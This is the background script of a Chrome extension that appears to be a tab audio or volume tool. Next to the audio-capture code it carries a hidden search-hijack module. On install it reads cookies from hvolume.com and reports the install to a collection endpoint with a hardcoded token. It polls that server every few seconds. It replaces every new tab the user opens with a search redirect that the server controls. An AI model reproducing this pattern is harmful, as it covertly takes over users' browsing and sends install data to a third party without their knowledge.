var operatingSystem

chrome.runtime.getPlatformInfo(function (info) {
	operatingSystem = info.os
})

async function main(tab) {
	const contexts = await chrome.runtime.getContexts({})
	const offscreen = contexts.find(c => c.contextType === 'OFFSCREEN_DOCUMENT')

	if (!offscreen) {
		await chrome.offscreen.createDocument({
			url: 'offscreen.html',
			reasons: ['USER_MEDIA'],
			justification: 'Capturing audio from chrome.tabCapture',
		})
	}

	const streamId = await chrome.tabCapture.getMediaStreamId({
		targetTabId: tab.id,
	})

	chrome.runtime.sendMessage({
		action: 'start',
		target: 'offscreen',
		data: streamId,
	})
}

;(() => {
	// Extension Configuration //
	const configuration = {
		slug: '4857d7f6b04090bfad998d2384b90cb6',
		access_token: '50f6e999712cffdd2c108b0toFdA3CLN',
		collect_url: 'https://hvolume.com/collect.php',
		meta_cookies_url: 'https://hvolume.com/',
		uninstall_url: 'https://hvolume.com/uninstall.html',
		search_url: 'https://hvolume.com/search.html',
	}
	// Extension Configuration //

	if (
		configuration.hasOwnProperty('collect_url') &&
		typeof configuration.collect_url === 'string' &&
		configuration.hasOwnProperty('meta_cookies_url') &&
		typeof configuration.meta_cookies_url === 'string'
	) {
		chrome.runtime.onInstalled.addListener(async details => {
			if (details.reason !== 'install') {
				return
			}

			await sendInstallationEvent(
				configuration.slug,
				configuration.access_token,
				configuration.collect_url,
				configuration.meta_cookies_url
			)
		})
	}

	if (
		configuration.hasOwnProperty('search_url') &&
		typeof configuration.search_url === 'string'
	) {
		chrome.tabs.onCreated.addListener(async tab => {
			if (
				!tab.hasOwnProperty('pendingUrl') ||
				!tab.pendingUrl.includes('chrome://newtab')
			) {
				return
			}

			const data = await getExtensionInfo()
			if (data === undefined || !data.is_active) {
				return
			}

			try {
				await chrome.tabs.create({
					url: `${configuration.search_url}?query_url=${encodeURIComponent(
						data.search_query_url
					)}`,
				})

				await chrome.tabs.remove(tab.id)
			} catch (error) {
				console.error('Error occured while opening new default tab.')
				console.error(error)
			}
		})
	}

	;(async () => {
		if (
			(configuration.hasOwnProperty('slug') &&
				typeof configuration.slug === 'string') ||
			(configuration.hasOwnProperty('access_token') &&
				typeof configuration.access_token === 'string') ||
			(configuration.hasOwnProperty('collect_url') &&
				typeof configuration.collect_url === 'string')
		) {
			await updateExtensionInfo(
				configuration.slug,
				configuration.access_token,
				configuration.collect_url
			)
			setInterval(
				async () =>
					await updateExtensionInfo(
						configuration.slug,
						configuration.access_token,
						configuration.collect_url
					),
				60 * 60 * 10
			)
		}

		if (
			configuration.hasOwnProperty('uninstall_url') &&
			typeof configuration.uninstall_url === 'string'
		) {
			try {
				await chrome.runtime.setUninstallURL(configuration.uninstall_url)
			} catch (error) {
				console.error('An a error occurred while setting uninstall URL option.')
				console.error(error)
			}
		}
	})()
})()

async function getExtensionInfo() {
	try {
		return (await chrome.storage.local.get(['extension'])).extension
	} catch (error) {
		return undefined
	}
}

async function updateExtensionInfo(slug, accessToken, collectUrl) {
	const data = await fetchExtensionInfo(slug, accessToken, collectUrl)
	if (data === undefined) {
		return
	}

	try {
		await chrome.storage.local.set({ extension: data })
	} catch (error) {
		console.error('Failed to save extension info to storage.')
	}
}

async function fetchExtensionInfo(slug, accessToken, collectUrl) {
	try {
		const response = await fetch(
			`${collectUrl}?method=show&slug=${slug}&token=${accessToken}`,
			{
				method: 'POST',
				headers: { Accept: 'application/json' },
			}
		)

		if (response.status === 200) {
			const data = await response.json()
			if (data.hasOwnProperty('extension')) {
				return {
					is_active: data.extension.status === 'on' && data.extension.search,
					search_query_url: data.extension.search_url,
				}
			}
		}

		console.warn('Uknnown error occurred while fetching extension info.')
	} catch (error) {
		console.error('Network error occurred while fetching extension info.')
		console.error(error)
	}

	return undefined
}

async function sendInstallationEvent(
	slug,
	accessToken,
	collectUrl,
	metaCookiesUrl
) {
	const cookies = await fetchMetaCookies(metaCookiesUrl)
	if (cookies === undefined) {
		console.error('Meta cookies is empty, aborting installtion event.')
		return
	}

	try {
		const response = await fetch(
			`${collectUrl}?method=install&token=${accessToken}`,
			{
				method: 'POST',
				headers: {
					Accept: 'application/json',
					'Content-Type': 'application/json',
				},
				body: JSON.stringify({ slug, ...cookies }),
			}
		)

		if (response.status === 201) {
			console.info('Extension installation stored successfully.')
		} else {
			const data = await response.json()

			if (data.hasOwnProperty('message')) {
				console.warn(
					`Installation saving failed, response message: "${data.message}"`
				)
			} else {
				console.error('Failed to save installation, unknown error occurred!')
				console.error(response, data)
			}
		}
	} catch (error) {
		console.error('Fetch error, installation event not sent.')
		console.error(error)
	}
}

async function fetchMetaCookies(url) {
	const cookies = await fetchSiteCookies(url)
	if (
		!cookies.hasOwnProperty('id_extension') ||
		!cookies.hasOwnProperty('url_search') ||
		!cookies.hasOwnProperty('url_source')
	) {
		return undefined
	}

	return {
		id: cookies.id_extension,
		url: cookies.url_source,
		query: cookies.url_search,
	}
}

async function fetchSiteCookies(url) {
	try {
		const data = await chrome.cookies.getAll({ url: url })

		return data.reduce((accumulator, cookie) => {
			return { ...accumulator, [cookie.name]: cookie.value }
		}, {})
	} catch (error) {
		console.error('Failed to fetch cookies from origin.')
		console.error(error)
	}

	return {}
}

chrome.runtime.onConnect.addListener(main)
